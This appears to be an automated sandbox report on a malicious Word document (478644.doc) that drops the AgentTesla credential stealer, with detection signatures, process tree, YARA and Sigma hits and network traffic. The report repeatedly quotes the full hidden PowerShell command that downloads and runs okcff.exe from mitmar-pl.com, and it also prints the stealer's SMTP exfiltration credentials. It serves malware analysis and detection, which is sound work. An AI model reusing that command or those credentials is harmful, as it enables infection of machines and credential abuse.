
Windows Analysis Report 478644.doc

Overview

General Information

Sample Name: 478644.doc
Analysis ID: 553100
MD5: c0f8f2fc481e9be7141d84b401edf1f7
SHA1: ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256: 4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 1308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 292 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • okcff.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Roaming\okcff.exe" MD5: E9416A322E9A796D45588BC4FB04CD45)
        • cmd.exe (PID: 2028 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1972 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2060 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1864 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2100 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1892 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2780 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2712 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2228 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 448 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2632 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1188 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 836 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1308 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2424 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1204 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • okcff.exe (PID: 2176 cmdline: C:\Users\user\AppData\Roaming\okcff.exe MD5: E9416A322E9A796D45588BC4FB04CD45)
    • verclsid.exe (PID: 2432 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2652 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | see strings below
  • 0x325b:$sb1: -W Hidden
  • 0x324b:$sc1: -NoP
  • 0x3255:$sd1: -NonI
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x3250:$sf1: -sta

          Unpacked PEs

Source | Rule | Description | Author | Strings
41.0.okcff.exe.400000.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
41.0.okcff.exe.400000.9.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
41.0.okcff.exe.400000.13.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
41.0.okcff.exe.400000.13.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
9.2.okcff.exe.3605ff0.7.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                    Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started; Author: frack113; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: PowerShell DownloadFile
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: Verclsid.exe Runs COM Object
Source: Process started; Author: Victor Sergeev, oscd.community; Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2432
Sigma detected: PowerShell Download from URL
Source: Process started; Author: Florian Roth, oscd.community, Jonhnathan Ribeiro; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started; Author: James Pemberton / @4A616D6573; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

Data Obfuscation:

Sigma detected: Powershell download and execute file
Source: Process started; Author: Joe Security; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 41.0.okcff.exe.400000.5.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}
Multi AV Scanner detection for submitted file
Source: 478644.doc; Virustotal: Detection: 41%
Source: 478644.doc; ReversingLabs: Detection: 30%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\okcff.exe; Joe Sandbox ML: detected
Source: 41.0.okcff.exe.400000.5.unpack; Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.7.unpack; Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.9.unpack; Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.13.unpack; Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.11.unpack; Avira: Label: TR/Spy.Gen8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: okcff[1].exe.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic; DNS query: name: mitmar-pl.com
Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 4x nop then mov ecx, dword ptr [ebp-38h]
Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
Source: Joe Sandbox View; ASN Name: WKD-ASIE WKD-ASIE
Source: global traffic; HTTP traffic detected: GET /okcff.exe HTTP/1.1 | Host: mitmar-pl.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1 | Host: mitmar-pl.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 37.0.9.166 37.0.9.166
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:18 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 